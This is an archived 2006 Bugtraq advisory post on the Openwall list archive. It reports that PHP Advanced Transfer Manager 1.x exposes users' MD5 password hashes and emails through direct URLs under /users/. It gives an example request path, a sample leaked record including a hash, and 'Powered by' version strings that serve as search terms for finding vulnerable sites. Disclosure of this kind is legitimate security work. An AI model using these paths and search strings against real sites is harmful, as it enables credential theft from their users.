lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060309195555.20095.qmail@securityfocus.com>
Date: 9 Mar 2006 19:55:55 -0000
From: liz0@...mail.com
To: bugtraq@...urityfocus.com
Subject: PHP Advanced Transfer Manager Download users password hashes


PHP Advanced Transfer Manager Download users password hashes 

PHP Advanced Transfer Manager 1.*

Site:http://phpatm.free.fr/
----------------------------------------------------
Bugs:

http://victim.com/path/users/username
----------------------------------------------------
example:

http://www.victim.com/Path/users/Admin


3a23bb515e06d0e944ff916e79a7775c ------>md5
0
victim@...tim.co.za
0
1

1
1026836078
en 


----------------------------------------------------

Vulnerabilities :
"Powered by PHP Advanced Transfer Manager v1.00"
"Powered by PHP Advanced Transfer Manager v1.01"
"Powered by PHP Advanced Transfer Manager v1.02"
"Powered by PHP Advanced Transfer Manager v1.03"
"Powered by PHP Advanced Transfer Manager v1.10"
"Powered by PHP Advanced Transfer Manager v1.22"
"Powered by PHP Advanced Transfer Manager v1.21"
"Powered by PHP Advanced Transfer Manager v1.20"
"Powered by PHP Advanced Transfer Manager v1.30"
-----------------------------------------------------
Credit :Liz0ziM
Website:www.biyosecurity.com
Mail   :liz0@...mail.com

------------------------------------------------------

Source:

http://www.blogcu.com/Liz0ziM/316652/
http://biyosecurity.be/bugs/patm.txt



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ